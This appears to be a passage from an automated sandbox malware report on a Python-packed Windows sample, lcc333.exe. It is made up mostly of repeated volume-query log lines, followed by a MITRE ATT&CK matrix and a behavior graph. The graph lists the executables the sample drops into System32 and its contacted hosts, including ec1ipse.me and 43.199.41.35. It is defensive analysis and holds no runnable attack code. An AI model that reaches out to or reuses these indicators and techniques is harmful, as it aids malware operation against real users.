                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\select.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\_ssl.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\_hashlib.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\_queue.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\_bz2.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\_lzma.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md.cp312-win_amd64.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md__mypyc.cp312-win_amd64.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\unicodedata.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\certifi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\windows2.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\windows2.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\windows2.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Windows\System32\python.bat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Windows\System32\app_process.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Windows\System32\AutoDesk.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Windows\System32\play.bat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Windows\System32\nircmd.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.bat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C8D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF714C8D010
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF714CA5C00
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140002BB0 GetVersionExA,15_2_0000000140002BB0
                        Source: C:\Windows\System32\app_process.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts1
                        Windows Management Instrumentation                        		1
                        Scripting                        		22
                        Process Injection                        		121
                        Masquerading                        		OS Credential Dumping2
                        System Time Discovery                        		Remote Services1
                        Screen Capture                        		11
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Native API                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Virtualization/Sandbox Evasion                        		LSASS Memory21
                        Security Software Discovery                        		Remote Desktop Protocol1
                        Archive Collected Data                        		11
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                        Disable or Modify Tools                        		Security Account Manager1
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin Shares3
                        Clipboard Data                        		1
                        Ingress Tool Transfer                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                        Process Injection                        		NTDS2
                        Process Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
                        Application Window Discovery                        		SSHKeylogging3
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Obfuscated Files or Information                        		Cached Domain Credentials1
                        File and Directory Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading                        		DCSync25
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562222 Sample: lcc333.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 60 83 ec1ipse.me 2->83 95 PE file contains section with special chars 2->95 97 Uses known network protocols on non-standard ports 2->97 99 AI detected suspicious sample 2->99 11 lcc333.exe 21 2->11         started        signatures3 process4 file5 69 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->69 dropped 71 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 11->71 dropped 73 C:\Users\user\AppData\Local\...\python312.dll, PE32+ 11->73 dropped 75 12 other files (none is malicious) 11->75 dropped 14 lcc333.exe 7 11->14         started        process6 dnsIp7 85 43.199.41.35, 49705, 8080 LILLY-ASUS Japan 14->85 77 C:\Windows\System32\nircmd.exe, PE32+ 14->77 dropped 79 C:\Windows\System32\app_process.exe, PE32+ 14->79 dropped 81 C:\Windows\System32\AutoDesk.exe, PE32+ 14->81 dropped 18 cmd.exe 1 14->18         started        21 cmd.exe 1 14->21         started        23 cmd.exe 1 14->23         started        file8 process9 signatures10 91 Drops executables to the windows directory (C:\Windows) and starts them 18->91 25 nircmd.exe 18->25         started        28 nircmd.exe 18->28         started        30 nircmd.exe 18->30         started        38 5 other processes 18->38 93 Uses the nircmd tool (NirSoft) 21->93 32 cmd.exe 21->32         started        34 cmd.exe 1 21->34         started        36 taskkill.exe 1 21->36         started        40 3 other processes 21->40 42 2 other processes 23->42 process11 signatures12 101 Drops executables to the windows directory (C:\Windows) and starts them 25->101 44 app_process.exe 1 25->44         started        46 app_process.exe 1 28->46         started        49 app_process.exe 1 30->49         started        51 conhost.exe 32->51         started        53 AutoDesk.exe 1 32->53         started        55 conhost.exe 34->55         started        57 AutoDesk.exe 1 34->57         started        59 app_process.exe 1 38->59         started        process13 dnsIp14 61 conhost.exe 44->61         started        87 20.2.154.66 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 46->87 63 conhost.exe 46->63         started        89 ec1ipse.me 172.233.211.124 AKAMAI-ASN1EU United States 49->89 65 conhost.exe 49->65         started        67 conhost.exe 59->67         started        process15

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
